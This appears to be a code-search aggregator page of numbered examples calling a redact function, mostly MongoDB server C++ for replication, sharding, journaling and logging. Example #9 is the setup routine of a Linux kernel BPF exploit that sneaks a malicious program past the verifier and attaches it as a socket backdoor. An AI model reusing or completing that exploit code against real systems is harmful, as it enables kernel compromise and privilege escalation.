Пример #1
0
OpTimeWithHash BackgroundSync::_readLastAppliedOpTimeWithHash(OperationContext* opCtx) {
    BSONObj oplogEntry;
    try {
        bool success = writeConflictRetry(
            opCtx, "readLastAppliedHash", NamespaceString::kRsOplogNamespace.ns(), [&] {
                Lock::DBLock lk(opCtx, "local", MODE_X);
                return Helpers::getLast(
                    opCtx, NamespaceString::kRsOplogNamespace.ns().c_str(), oplogEntry);
            });

        if (!success) {
            // This can happen when we are to do an initial sync.  lastHash will be set
            // after the initial sync is complete.
            return OpTimeWithHash(0);
        }
    } catch (const DBException& ex) {
        severe() << "Problem reading " << NamespaceString::kRsOplogNamespace.ns() << ": "
                 << redact(ex);
        fassertFailed(18904);
    }
    long long hash;
    auto status = bsonExtractIntegerField(oplogEntry, kHashFieldName, &hash);
    if (!status.isOK()) {
        severe() << "Most recent entry in " << NamespaceString::kRsOplogNamespace.ns()
                 << " is missing or has invalid \"" << kHashFieldName
                 << "\" field. Oplog entry: " << redact(oplogEntry) << ": " << redact(status);
        fassertFailed(18902);
    }
    OplogEntry parsedEntry(oplogEntry);
    return OpTimeWithHash(hash, parsedEntry.getOpTime());
}
Пример #2
0
void ClusterAggregate::killAllCursors(const std::vector<Strategy::CommandResult>& shardResults) {
    // This function must ignore and log all errors. Callers expect a best-effort attempt at
    // cleanup without exceptions. If any cursors aren't cleaned up here, they will be cleaned
    // up automatically on the shard after 10 minutes anyway.

    for (size_t i = 0; i < shardResults.size(); i++) {
        try {
            BSONObj result = shardResults[i].result;
            if (!result["ok"].trueValue()) {
                continue;
            }

            const long long cursor = result["cursor"]["id"].Long();
            if (!cursor) {
                continue;
            }

            ScopedDbConnection conn(shardResults[i].target);
            conn->killCursor(cursor);
            conn.done();
        } catch (const DBException& e) {
            log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target
                  << " due to DBException: " << redact(e);
        } catch (const std::exception& e) {
            log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target
                  << " due to std::exception: " << redact(e.what());
        } catch (...) {
            log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target
                  << " due to non-exception";
        }
    }
}
Пример #3
0
/**
 * Remaps the private view from the shared view so that it does not consume too much
 * copy-on-write/swap space. Must only be called after the in-memory journal has been flushed
 * to disk and applied on top of the shared view.
 *
 * @param fraction Value between (0, 1] indicating what fraction of the memory to remap.
 *      Remapping too much or too frequently incurs copy-on-write page fault cost.
 */
static void remapPrivateView(OperationContext* opCtx, double fraction) {
    // Remapping private views must occur after WRITETODATAFILES otherwise we wouldn't see any
    // newly written data on reads.
    invariant(!commitJob.hasWritten());

    try {
        Timer t;
        remapPrivateViewImpl(opCtx, fraction);
        stats.curr()->_remapPrivateViewMicros += t.micros();

        LOG(4) << "remapPrivateView end";
        return;
    } catch (DBException& e) {
        severe() << "dbexception in remapPrivateView causing immediate shutdown: " << redact(e);
    } catch (std::ios_base::failure& e) {
        severe() << "ios_base exception in remapPrivateView causing immediate shutdown: "
                 << redact(e.what());
    } catch (std::bad_alloc& e) {
        severe() << "bad_alloc exception in remapPrivateView causing immediate shutdown: "
                 << redact(e.what());
    } catch (std::exception& e) {
        severe() << "exception in remapPrivateView causing immediate shutdown: "
                 << redact(e.what());
    } catch (...) {
        severe() << "unknown exception in remapPrivateView causing immediate shutdown: ";
    }

    invariant(false);
}
Пример #4
0
/**
 * Invoked at server startup. Recovers the database by replaying journal files and then
 * starts the durability thread.
 */
void startup(ClockSource* cs, int64_t serverStartMs) {
    if (!storageGlobalParams.dur) {
        return;
    }

    journalMakeDir(cs, serverStartMs);

    try {
        replayJournalFilesAtStartup();
    } catch (DBException& e) {
        severe() << "dbexception during recovery: " << redact(e);
        throw;
    } catch (std::exception& e) {
        severe() << "std::exception during recovery: " << redact(e.what());
        throw;
    } catch (...) {
        severe() << "exception during recovery";
        throw;
    }

    preallocateFiles();

    durableImpl.start(cs, serverStartMs);
    DurableInterface::_impl = &durableImpl;
}
void ShardingEgressMetadataHookForMongos::_saveGLEStats(const BSONObj& metadata,
                                                        StringData hostString) {
    if (!haveClient()) {
        // Client will be present only when write commands are used.
        return;
    }

    auto swShardingMetadata = rpc::ShardingMetadata::readFromMetadata(metadata);
    if (swShardingMetadata.getStatus() == ErrorCodes::NoSuchKey) {
        return;
    } else if (!swShardingMetadata.isOK()) {
        warning() << "Got invalid sharding metadata " << redact(swShardingMetadata.getStatus())
                  << " metadata object was '" << redact(metadata) << "'";
        return;
    }

    auto shardConn = ConnectionString::parse(hostString.toString());

    // If we got the reply from this host, we expect that its 'hostString' must be valid.
    if (!shardConn.isOK()) {
        severe() << "got bad host string in saveGLEStats: " << hostString;
    }
    invariantOK(shardConn.getStatus());

    auto shardingMetadata = std::move(swShardingMetadata.getValue());

    auto& clientInfo = cc();
    LOG(4) << "saveGLEStats lastOpTime:" << shardingMetadata.getLastOpTime()
           << " electionId:" << shardingMetadata.getLastElectionId();

    ClusterLastErrorInfo::get(clientInfo)
        ->addHostOpTime(
            shardConn.getValue(),
            HostOpTime(shardingMetadata.getLastOpTime(), shardingMetadata.getLastElectionId()));
}
Пример #6
0
void CollectionCloner::_finishCallback(const Status& status) {
    LOG(1) << "CollectionCloner ns:" << _destNss << " finished with status: " << redact(status);
    // Copy the status so we can change it below if needed.
    auto finalStatus = status;
    bool callCollectionLoader = false;
    UniqueLock lk(_mutex);
    callCollectionLoader = _collLoader.operator bool();
    lk.unlock();
    if (callCollectionLoader) {
        if (finalStatus.isOK()) {
            const auto loaderStatus = _collLoader->commit();
            if (!loaderStatus.isOK()) {
                warning() << "Failed to commit changes to collection " << _destNss.ns() << ": "
                          << redact(loaderStatus);
                finalStatus = loaderStatus;
            }
        }

        // This will release the resources held by the loader.
        _collLoader.reset();
    }
    _onCompletion(finalStatus);
    lk.lock();
    _stats.end = _executor->now();
    _progressMeter.finished();
    _active = false;
    _condition.notify_all();
    LOG(1) << "    collection: " << _destNss << ", stats: " << _stats.toString();
}
Пример #7
0
long long BackgroundSync::_readLastAppliedHash(OperationContext* txn) {
    BSONObj oplogEntry;
    try {
        MONGO_WRITE_CONFLICT_RETRY_LOOP_BEGIN {
            ScopedTransaction transaction(txn, MODE_IX);
            Lock::DBLock lk(txn->lockState(), "local", MODE_X);
            bool success = Helpers::getLast(txn, rsOplogName.c_str(), oplogEntry);
            if (!success) {
                // This can happen when we are to do an initial sync.  lastHash will be set
                // after the initial sync is complete.
                return 0;
            }
        }
        MONGO_WRITE_CONFLICT_RETRY_LOOP_END(txn, "readLastAppliedHash", rsOplogName);
    } catch (const DBException& ex) {
        severe() << "Problem reading " << rsOplogName << ": " << redact(ex);
        fassertFailed(18904);
    }
    long long hash;
    auto status = bsonExtractIntegerField(oplogEntry, kHashFieldName, &hash);
    if (!status.isOK()) {
        severe() << "Most recent entry in " << rsOplogName << " is missing or has invalid \""
                 << kHashFieldName << "\" field. Oplog entry: " << redact(oplogEntry) << ": "
                 << redact(status);
        fassertFailed(18902);
    }
    return hash;
}
void onDbVersionMismatch(OperationContext* opCtx,
                         const StringData dbName,
                         const DatabaseVersion& clientDbVersion,
                         const boost::optional<DatabaseVersion>& serverDbVersion) noexcept {
    invariant(!opCtx->lockState()->isLocked());
    invariant(!opCtx->getClient()->isInDirectClient());

    auto const shardingState = ShardingState::get(opCtx);
    invariant(shardingState->canAcceptShardedCommands());

    if (serverDbVersion && serverDbVersion->getUuid() == clientDbVersion.getUuid() &&
        serverDbVersion->getLastMod() >= clientDbVersion.getLastMod()) {
        // The client was stale; do not trigger server-side refresh.
        return;
    }

    try {
        // TODO SERVER-33773 if the 'waitForMovePrimaryCriticalSection' flag is set on the
        // OperationShardingState, wait for the movePrimary critical section to complete before
        // attempting a refresh.
    } catch (const DBException& ex) {
        log() << "Failed to wait for movePrimary critical section to complete "
              << causedBy(redact(ex));
        return;
    }

    try {
        forceDatabaseRefresh(opCtx, dbName);
    } catch (const DBException& ex) {
        log() << "Failed to refresh databaseVersion for database " << dbName
              << causedBy(redact(ex));
    }
}
Пример #9
0
void 
initialize() {
	info("\n");
	info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
	info("\n");
	info("  ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
	info("\n");

	redact("creating bpf map\n");
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
	if (mapfd < 0) {
		fail("failed to create bpf map: '%s'\n", strerror(errno));
	}

	redact("sneaking evil bpf past the verifier\n");
	progfd = load_prog();
	if (progfd < 0) {
		if (errno == EACCES) {
			msg("log:\n%s", bpf_log_buf);
		}
		fail("failed to load prog '%s'\n", strerror(errno));
	}

	redact("creating socketpair()\n");
	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
		fail("failed to create socket pair '%s'\n", strerror(errno));
	}

	redact("attaching bpf backdoor to socket\n");
	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
		fail("setsockopt '%s'\n", strerror(errno));
	}
}
Пример #10
0
Status ShardingStateRecovery::recover(OperationContext* opCtx) {
    if (serverGlobalParams.clusterRole != ClusterRole::ShardServer) {
        return Status::OK();
    }

    BSONObj recoveryDocBSON;

    try {
        AutoGetCollection autoColl(opCtx, NamespaceString::kConfigCollectionNamespace, MODE_IS);
        if (!Helpers::findOne(
                opCtx, autoColl.getCollection(), RecoveryDocument::getQuery(), recoveryDocBSON)) {
            return Status::OK();
        }
    } catch (const DBException& ex) {
        return ex.toStatus();
    }

    const auto recoveryDocStatus = RecoveryDocument::fromBSON(recoveryDocBSON);
    if (!recoveryDocStatus.isOK())
        return recoveryDocStatus.getStatus();

    const auto recoveryDoc = std::move(recoveryDocStatus.getValue());

    log() << "Sharding state recovery process found document " << redact(recoveryDoc.toBSON());

    ShardingState* const shardingState = ShardingState::get(opCtx);
    invariant(shardingState->enabled());

    if (!recoveryDoc.getMinOpTimeUpdaters()) {
        // Treat the minOpTime as up-to-date
        grid.advanceConfigOpTime(recoveryDoc.getMinOpTime());
        return Status::OK();
    }

    log() << "Sharding state recovery document indicates there were "
          << recoveryDoc.getMinOpTimeUpdaters()
          << " metadata change operations in flight. Contacting the config server primary in order "
             "to retrieve the most recent opTime.";

    // Need to fetch the latest uptime from the config server, so do a logging write
    Status status =
        grid.catalogClient(opCtx)->logChange(opCtx,
                                             "Sharding minOpTime recovery",
                                             NamespaceString::kConfigCollectionNamespace.ns(),
                                             recoveryDocBSON,
                                             ShardingCatalogClient::kMajorityWriteConcern);
    if (!status.isOK())
        return status;

    log() << "Sharding state recovered. New config server opTime is " << grid.configOpTime();

    // Finally, clear the recovery document so next time we don't need to recover
    status = modifyRecoveryDocument(opCtx, RecoveryDocument::Clear, kLocalWriteConcern);
    if (!status.isOK()) {
        warning() << "Failed to reset sharding state recovery document due to " << redact(status);
    }

    return Status::OK();
}
Пример #11
0
void AbstractIndexAccessMethod::getKeys(const BSONObj& obj,
                                        GetKeysMode mode,
                                        BSONObjSet* keys,
                                        BSONObjSet* multikeyMetadataKeys,
                                        MultikeyPaths* multikeyPaths) const {
    // TODO SERVER-36385: Remove ErrorCodes::KeyTooLong.
    static stdx::unordered_set<int> whiteList{ErrorCodes::CannotBuildIndexKeys,
                                              // Btree
                                              ErrorCodes::KeyTooLong,
                                              ErrorCodes::CannotIndexParallelArrays,
                                              // FTS
                                              16732,
                                              16733,
                                              16675,
                                              17261,
                                              17262,
                                              // Hash
                                              16766,
                                              // Haystack
                                              16775,
                                              16776,
                                              // 2dsphere geo
                                              16755,
                                              16756,
                                              // 2d geo
                                              16804,
                                              13067,
                                              13068,
                                              13026,
                                              13027};
    try {
        doGetKeys(obj, keys, multikeyMetadataKeys, multikeyPaths);
    } catch (const AssertionException& ex) {
        // Suppress all indexing errors when mode is kRelaxConstraints.
        if (mode == GetKeysMode::kEnforceConstraints) {
            throw;
        }

        keys->clear();
        if (multikeyPaths) {
            multikeyPaths->clear();
        }
        // Only suppress the errors in the whitelist.
        if (whiteList.find(ex.code()) == whiteList.end()) {
            throw;
        }

        // If the document applies to the filter (which means that it should have never been
        // indexed), do not supress the error.
        const MatchExpression* filter = _btreeState->getFilterExpression();
        if (mode == GetKeysMode::kRelaxConstraintsUnfiltered && filter &&
            filter->matchesBSON(obj)) {
            throw;
        }

        LOG(1) << "Ignoring indexing error for idempotency reasons: " << redact(ex)
               << " when getting index keys of " << redact(obj);
    }
}
Пример #12
0
static void logCursorsWaiting(RangeDeleteEntry* entry) {
    // We always log the first cursors waiting message (so we have cursor ids in the logs).
    // After 15 minutes (the cursor timeout period), we start logging additional messages at
    // a 1 minute interval.
    static const auto kLogCursorsThreshold = Minutes{15};
    static const auto kLogCursorsInterval = Minutes{1};

    Date_t currentTime = jsTime();
    Milliseconds elapsedMillisSinceQueued{0};

    // We always log the first message when lastLoggedTime == 0
    if (entry->lastLoggedTS != Date_t()) {
        if (currentTime > entry->stats.queueStartTS)
            elapsedMillisSinceQueued = currentTime - entry->stats.queueStartTS;

        // Not logging, threshold not passed
        if (elapsedMillisSinceQueued < kLogCursorsThreshold)
            return;

        Milliseconds elapsedMillisSinceLog{0};
        if (currentTime > entry->lastLoggedTS)
            elapsedMillisSinceLog = currentTime - entry->lastLoggedTS;

        // Not logging, logged a short time ago
        if (elapsedMillisSinceLog < kLogCursorsInterval)
            return;
    }

    str::stream cursorList;
    for (std::set<CursorId>::const_iterator it = entry->cursorsToWait.begin();
         it != entry->cursorsToWait.end();
         ++it) {
        if (it != entry->cursorsToWait.begin())
            cursorList << ", ";
        cursorList << *it;
    }

    log() << "waiting for open cursors before removing range "
          << "[" << redact(entry->options.range.minKey) << ", "
          << redact(entry->options.range.maxKey) << ") "
          << "in " << entry->options.range.ns
          << (entry->lastLoggedTS == Date_t()
                  ? string("")
                  : string(str::stream() << ", elapsed secs: "
                                         << durationCount<Seconds>(elapsedMillisSinceQueued)))
          << ", cursor ids: [" << string(cursorList) << "]";

    entry->lastLoggedTS = currentTime;
}
Пример #13
0
MoveTimingHelper::~MoveTimingHelper() {
    // even if logChange doesn't throw, bson does
    // sigh
    try {
        if (_to.isValid()) {
            _b.append("to", _to.toString());
        }

        if (_from.isValid()) {
            _b.append("from", _from.toString());
        }

        if (_nextStep != _totalNumSteps) {
            _b.append("note", "aborted");
        } else {
            _b.append("note", "success");
        }

        if (!_cmdErrmsg->empty()) {
            _b.append("errmsg", *_cmdErrmsg);
        }

        grid.catalogClient(_txn)->logChange(_txn,
                                            str::stream() << "moveChunk." << _where,
                                            _ns,
                                            _b.obj(),
                                            ShardingCatalogClient::kMajorityWriteConcern);
    } catch (const std::exception& e) {
        warning() << "couldn't record timing for moveChunk '" << _where
                  << "': " << redact(e.what());
    }
}
Пример #14
0
StatusWith<DistLockManager::ScopedDistLock> MigrationManager::_getDistLock(
    OperationContext* txn, const Migration& migration) {
    const std::string whyMessage(str::stream() << "migrating chunk "
                                               << ChunkRange(migration.chunkInfo.migrateInfo.minKey,
                                                             migration.chunkInfo.migrateInfo.maxKey)
                                                      .toString()
                                               << " in "
                                               << migration.chunkInfo.migrateInfo.ns);

    StatusWith<DistLockManager::ScopedDistLock> distLockStatus =
        Grid::get(txn)->catalogClient(txn)->distLock(
            txn, migration.chunkInfo.migrateInfo.ns, whyMessage);

    if (!distLockStatus.isOK()) {
        const std::string msg = str::stream()
            << "Could not acquire collection lock for " << migration.chunkInfo.migrateInfo.ns
            << " to migrate chunk " << redact(ChunkRange(migration.chunkInfo.migrateInfo.minKey,
                                                         migration.chunkInfo.migrateInfo.maxKey)
                                                  .toString())
            << " due to " << distLockStatus.getStatus().toString();
        warning() << msg;
        return {distLockStatus.getStatus().code(), msg};
    }

    return std::move(distLockStatus.getValue());
}
Пример #15
0
void BackgroundJob::jobBody() {
    const string threadName = name();
    if (!threadName.empty()) {
        setThreadName(threadName);
    }

    LOG(1) << "BackgroundJob starting: " << threadName;

    try {
        run();
    } catch (const std::exception& e) {
        error() << "backgroundjob " << threadName << " exception: " << redact(e.what());
        throw;
    }

    // We must cache this value so that we can use it after we leave the following scope.
    const bool selfDelete = _selfDelete;

    {
        // It is illegal to access any state owned by this BackgroundJob after leaving this
        // scope, with the exception of the call to 'delete this' below.
        stdx::unique_lock<stdx::mutex> l(_status->mutex);
        _status->state = Done;
        _status->done.notify_all();
    }

    if (selfDelete)
        delete this;
}
Пример #16
0
void Database::clearTmpCollections(OperationContext* txn) {
    invariant(txn->lockState()->isDbLockedForMode(name(), MODE_X));

    list<string> collections;
    _dbEntry->getCollectionNamespaces(&collections);

    for (list<string>::iterator i = collections.begin(); i != collections.end(); ++i) {
        string ns = *i;
        invariant(NamespaceString::normal(ns));

        CollectionCatalogEntry* coll = _dbEntry->getCollectionCatalogEntry(ns);

        CollectionOptions options = coll->getCollectionOptions(txn);
        if (!options.temp)
            continue;
        try {
            WriteUnitOfWork wunit(txn);
            Status status = dropCollection(txn, ns);
            if (!status.isOK()) {
                warning() << "could not drop temp collection '" << ns << "': " << redact(status);
                continue;
            }

            wunit.commit();
        } catch (const WriteConflictException& exp) {
            warning() << "could not drop temp collection '" << ns << "' due to "
                                                                     "WriteConflictException";
            txn->recoveryUnit()->abandonSnapshot();
        }
    }
}
std::string MoveChunkRequest::toString() const {
    std::stringstream ss;
    ss << "ns: " << getNss().ns() << ", " << redact(ChunkRange(getMinKey(), getMaxKey()).toString())
       << ", fromShard: " << getFromShardId() << ", toShard: " << getToShardId();

    return ss.str();
}
Пример #18
0
void WiredTigerRecoveryUnit::_abort() {
    try {
        bool notifyDone = !_prepareTimestamp.isNull();
        if (_session && _isActive()) {
            _txnClose(false);
        }
        _setState(State::kAborting);

        if (MONGO_FAIL_POINT(WTAlwaysNotifyPrepareConflictWaiters)) {
            notifyDone = true;
        }

        if (notifyDone) {
            _sessionCache->notifyPreparedUnitOfWorkHasCommittedOrAborted();
        }

        for (Changes::const_reverse_iterator it = _changes.rbegin(), end = _changes.rend();
             it != end;
             ++it) {
            Change* change = it->get();
            LOG(2) << "CUSTOM ROLLBACK " << redact(demangleName(typeid(*change)));
            change->rollback();
        }
        _changes.clear();
    } catch (...) {
        std::terminate();
    }

    _setState(State::kInactive);
}
Пример #19
0
Database::Database(OperationContext* txn, StringData name, DatabaseCatalogEntry* dbEntry)
    : _name(name.toString()),
      _dbEntry(dbEntry),
      _profileName(_name + ".system.profile"),
      _indexesName(_name + ".system.indexes"),
      _viewsName(_name + "." + DurableViewCatalog::viewsCollectionName().toString()),
      _durableViews(DurableViewCatalogImpl(this)),
      _views(&_durableViews) {
    Status status = validateDBName(_name);
    if (!status.isOK()) {
        warning() << "tried to open invalid db: " << _name;
        uasserted(10028, status.toString());
    }

    _profile = serverGlobalParams.defaultProfile;

    list<string> collections;
    _dbEntry->getCollectionNamespaces(&collections);
    for (list<string>::const_iterator it = collections.begin(); it != collections.end(); ++it) {
        const string ns = *it;
        _collections[ns] = _getOrCreateCollectionInstance(txn, ns);
    }
    // At construction time of the viewCatalog, the _collections map wasn't initialized yet, so no
    // system.views collection would be found. Now we're sufficiently initialized, signal a version
    // change. Also force a reload, so if there are problems with the catalog contents as might be
    // caused by incorrect mongod versions or similar, they are found right away.
    _views.invalidate();
    Status reloadStatus = _views.reloadIfNeeded(txn);
    if (!reloadStatus.isOK()) {
        warning() << "Unable to parse views: " << redact(reloadStatus)
                  << "; remove any invalid views from the " << _viewsName
                  << " collection to restore server functionality." << startupWarningsLog;
    }
}
void NetworkInterfaceASIO::_beginCommunication(AsyncOp* op) {
    // The way that we connect connections for the connection pool is by
    // starting the callback chain with connect(), but getting off at the first
    // _beginCommunication. I.e. all AsyncOp's start off with _inSetup == true
    // and arrive here as they're connected and authed. Once they hit here, we
    // return to the connection pool's get() callback with _inSetup == false,
    // so we can proceed with user operations after they return to this
    // codepath.
    if (op->_inSetup) {
        log() << "Successfully connected to " << op->request().target.toString();
        op->_inSetup = false;
        op->finish(RemoteCommandResponse());
        return;
    }

    LOG(3) << "Initiating asynchronous command: " << redact(op->request().toString());

    auto beginStatus = op->beginCommand(op->request());
    if (!beginStatus.isOK()) {
        return _completeOperation(op, beginStatus);
    }

    _asyncRunCommand(op, [this, op](std::error_code ec, size_t bytes) {
        _validateAndRun(op, ec, [this, op]() { _completedOpCallback(op); });
    });
}
Пример #21
0
void ShardingStateRecovery::endMetadataOp(OperationContext* opCtx) {
    Status status =
        modifyRecoveryDocument(opCtx, RecoveryDocument::Decrement, WriteConcernOptions());
    if (!status.isOK()) {
        warning() << "Failed to decrement minOpTimeUpdaters due to " << redact(status);
    }
}
void ShardingInitializationMongoD::updateShardIdentityConfigString(
    OperationContext* opCtx, const ConnectionString& newConnectionString) {
    BSONObj updateObj(
        ShardIdentityType::createConfigServerUpdateObject(newConnectionString.toString()));

    UpdateRequest updateReq(NamespaceString::kServerConfigurationNamespace);
    updateReq.setQuery(BSON("_id" << ShardIdentityType::IdName));
    updateReq.setUpdateModification(updateObj);

    try {
        AutoGetOrCreateDb autoDb(
            opCtx, NamespaceString::kServerConfigurationNamespace.db(), MODE_X);

        auto result = update(opCtx, autoDb.getDb(), updateReq);
        if (result.numMatched == 0) {
            warning() << "failed to update config string of shard identity document because "
                      << "it does not exist. This shard could have been removed from the cluster";
        } else {
            LOG(2) << "Updated config server connection string in shardIdentity document to"
                   << newConnectionString;
        }
    } catch (const DBException& exception) {
        auto status = exception.toStatus();
        if (!ErrorCodes::isNotMasterError(status.code())) {
            warning() << "Error encountered while trying to update config connection string to "
                      << newConnectionString.toString() << causedBy(redact(status));
        }
    }
}
Пример #23
0
Message OpMsgBuilder::finish() {
    if (kDebugBuild && !disableDupeFieldCheck_forTest.load()) {
        std::set<StringData> seenFields;
        for (auto elem : resumeBody().asTempObj()) {
            if (!(seenFields.insert(elem.fieldNameStringData()).second)) {
                severe() << "OP_MSG with duplicate field '" << elem.fieldNameStringData()
                         << "' : " << redact(resumeBody().asTempObj());
                fassert(40474, false);
            }
        }
    }

    invariant(_state == kBody);
    invariant(_bodyStart);
    invariant(!_openBuilder);
    _state = kDone;

    const auto size = _buf.len();
    MSGHEADER::View header(_buf.buf());
    header.setMessageLength(size);
    // header.setRequestMsgId(...); // These are currently filled in by the networking layer.
    // header.setResponseToMsgId(...);
    header.setOpCode(dbMsg);
    return Message(_buf.release());
}
Пример #24
0
void RSDataSync::_run() {
    Client::initThread("rsSync");
    AuthorizationSession::get(cc())->grantInternalAuthorization();

    // Overwrite prefetch index mode in BackgroundSync if ReplSettings has a mode set.
    auto&& replSettings = _replCoord->getSettings();
    if (replSettings.isPrefetchIndexModeSet())
        _replCoord->setIndexPrefetchConfig(replSettings.getPrefetchIndexMode());

    while (!_bgsync->inShutdown()) {
        // After a reconfig, we may not be in the replica set anymore, so
        // check that we are in the set (and not an arbiter) before
        // trying to sync with other replicas.
        // TODO(spencer): Use a condition variable to await loading a config
        if (_replCoord->getMemberState().startup()) {
            warning() << "did not receive a valid config yet";
            sleepsecs(1);
            continue;
        }

        const MemberState memberState = _replCoord->getMemberState();

        // TODO(siyuan) Control the behavior using applier state.
        // An arbiter can never transition to any other state, and doesn't replicate, ever
        if (memberState.arbiter()) {
            break;
        }

        // If we are removed then we don't belong to the set anymore
        if (memberState.removed()) {
            sleepsecs(5);
            continue;
        }

        try {
            if (_replCoord->getApplierState() == ReplicationCoordinator::ApplierState::Stopped) {
                sleepsecs(1);
                continue;
            }

            auto status = _replCoord->setFollowerMode(MemberState::RS_RECOVERING);
            if (!status.isOK()) {
                LOG(2) << "Failed to transition to RECOVERING to start data replication"
                       << causedBy(status);
                continue;
            }

            // Once we call into SyncTail::oplogApplication we never return, so this code only runs
            // at startup.  It is not valid to transition from PRIMARY to RECOVERING ever, or from
            // SECONDARY to RECOVERING without holding a global X lock, so we invariant to make
            // sure this never happens.
            invariant(!memberState.primary() && !memberState.secondary());
            SyncTail(_bgsync, multiSyncApply).oplogApplication(_replCoord);
        } catch (...) {
            auto status = exceptionToStatus();
            severe() << "Exception thrown in RSDataSync: " << redact(status);
            std::terminate();
        }
    }
}
Пример #25
0
void CollectionCloner::_finishCallback(const Status& status) {
    log() << "CollectionCloner ns:" << _destNss
          << " finished cloning with status: " << redact(status);
    // Copy the status so we can change it below if needed.
    auto finalStatus = status;
    bool callCollectionLoader = false;
    decltype(_onCompletion) onCompletion;
    {
        LockGuard lk(_mutex);
        invariant(_state != State::kComplete);

        callCollectionLoader = _collLoader.operator bool();

        invariant(_onCompletion);
        std::swap(_onCompletion, onCompletion);
    }
    if (callCollectionLoader) {
        if (finalStatus.isOK()) {
            const auto loaderStatus = _collLoader->commit();
            if (!loaderStatus.isOK()) {
                warning() << "Failed to commit collection indexes " << _destNss.ns() << ": "
                          << redact(loaderStatus);
                finalStatus = loaderStatus;
            }
        }

        // This will release the resources held by the loader.
        _collLoader.reset();
    }
    onCompletion(finalStatus);

    // This will release the resources held by the callback function object. '_onCompletion' is
    // already cleared at this point and 'onCompletion' is the remaining reference to the callback
    // function (with any implicitly held resources). To avoid any issues with destruction logic
    // in the function object's resources accessing this CollectionCloner, we release this function
    // object outside the lock.
    onCompletion = {};

    LockGuard lk(_mutex);
    _stats.end = _executor->now();
    _progressMeter.finished();
    _state = State::kComplete;
    _condition.notify_all();
    LOG(1) << "    collection: " << _destNss << ", stats: " << _stats.toString();
}
StatusWith<OplogApplier::Operations> OplogApplier::getNextApplierBatch(
    OperationContext* opCtx, const BatchLimits& batchLimits) {
    if (batchLimits.ops == 0) {
        return Status(ErrorCodes::InvalidOptions, "Batch size must be greater than 0.");
    }

    std::uint32_t totalBytes = 0;
    Operations ops;
    BSONObj op;
    while (_oplogBuffer->peek(opCtx, &op)) {
        auto entry = OplogEntry(op);

        // Check for oplog version change. If it is absent, its value is one.
        if (entry.getVersion() != OplogEntry::kOplogVersion) {
            std::string message = str::stream()
                << "expected oplog version " << OplogEntry::kOplogVersion << " but found version "
                << entry.getVersion() << " in oplog entry: " << redact(entry.toBSON());
            severe() << message;
            return {ErrorCodes::BadValue, message};
        }

        // Commands must be processed one at a time. The only exception to this is applyOps because
        // applyOps oplog entries are effectively containers for CRUD operations. Therefore, it is
        // safe to batch applyOps commands with CRUD operations when reading from the oplog buffer.
        if (entry.isCommand() && (entry.getCommandType() != OplogEntry::CommandType::kApplyOps ||
                                  entry.shouldPrepare())) {
            if (ops.empty()) {
                // Apply commands one-at-a-time.
                ops.push_back(std::move(entry));
                BSONObj opToPopAndDiscard;
                invariant(_oplogBuffer->tryPop(opCtx, &opToPopAndDiscard));
                dassert(ops.back() == OplogEntry(opToPopAndDiscard));
            }

            // Otherwise, apply what we have so far and come back for the command.
            return std::move(ops);
        }

        // Apply replication batch limits.
        if (ops.size() >= batchLimits.ops) {
            return std::move(ops);
        }

        // Never return an empty batch if there are operations left.
        if ((totalBytes + entry.getRawObjSizeBytes() >= batchLimits.bytes) && (ops.size() > 0)) {
            return std::move(ops);
        }

        // Add op to buffer.
        totalBytes += entry.getRawObjSizeBytes();
        ops.push_back(std::move(entry));
        BSONObj opToPopAndDiscard;
        invariant(_oplogBuffer->tryPop(opCtx, &opToPopAndDiscard));
        dassert(ops.back() == OplogEntry(opToPopAndDiscard));
    }
    return std::move(ops);
}
Пример #27
0
NOINLINE_DECL void uassertedWithLocation(int msgid,
        const char* msg,
        const char* file,
        unsigned line) {
    assertionCount.condrollover(++assertionCount.user);
    LOG(1) << "User Assertion: " << msgid << ":" << redact(msg) << ' ' << file << ' ' << dec << line
           << endl;
    throw UserException(msgid, msg);
}
Пример #28
0
NOINLINE_DECL void msgassertedNoTraceWithLocation(int msgid,
        const char* msg,
        const char* file,
        unsigned line) {
    assertionCount.condrollover(++assertionCount.warning);
    log() << "Assertion: " << msgid << ":" << redact(msg) << ' ' << file << ' ' << dec << line
          << endl;
    throw MsgAssertionException(msgid, msg);
}
Пример #29
0
void BackgroundSync::_rollback(OperationContext* txn,
                               const HostAndPort& source,
                               stdx::function<DBClientBase*()> getConnection) {
    // Abort only when syncRollback detects we are in a unrecoverable state.
    // In other cases, we log the message contained in the error status and retry later.
    auto status = syncRollback(txn,
                               OplogInterfaceLocal(txn, rsOplogName),
                               RollbackSourceImpl(getConnection, source, rsOplogName),
                               _replCoord);
    if (status.isOK()) {
        // When the syncTail thread sees there is no new data by adding something to the buffer.
        _signalNoNewDataForApplier(txn);
        // Wait until the buffer is empty.
        // This is an indication that syncTail has removed the sentinal marker from the buffer
        // and reset its local lastAppliedOpTime via the replCoord.
        while (!_oplogBuffer->isEmpty()) {
            sleepmillis(10);
            if (inShutdown()) {
                return;
            }
        }

        // At this point we are about to leave rollback.  Before we do, wait for any writes done
        // as part of rollback to be durable, and then do any necessary checks that we didn't
        // wind up rolling back something illegal.  We must wait for the rollback to be durable
        // so that if we wind up shutting down uncleanly in response to something we rolled back
        // we know that we won't wind up right back in the same situation when we start back up
        // because the rollback wasn't durable.
        txn->recoveryUnit()->waitUntilDurable();

        // If we detected that we rolled back the shardIdentity document as part of this rollback
        // then we must shut down to clear the in-memory ShardingState associated with the
        // shardIdentity document.
        if (ShardIdentityRollbackNotifier::get(txn)->didRollbackHappen()) {
            severe()
                << "shardIdentity document rollback detected.  Shutting down to clear "
                   "in-memory sharding state.  Restarting this process should safely return it "
                   "to a healthy state";
            fassertFailedNoTrace(40276);
        }

        // It is now safe to clear the ROLLBACK state, which may result in the applier thread
        // transitioning to SECONDARY.  This is safe because the applier thread has now reloaded
        // the new rollback minValid from the database.
        if (!_replCoord->setFollowerMode(MemberState::RS_RECOVERING)) {
            warning() << "Failed to transition into " << MemberState(MemberState::RS_RECOVERING)
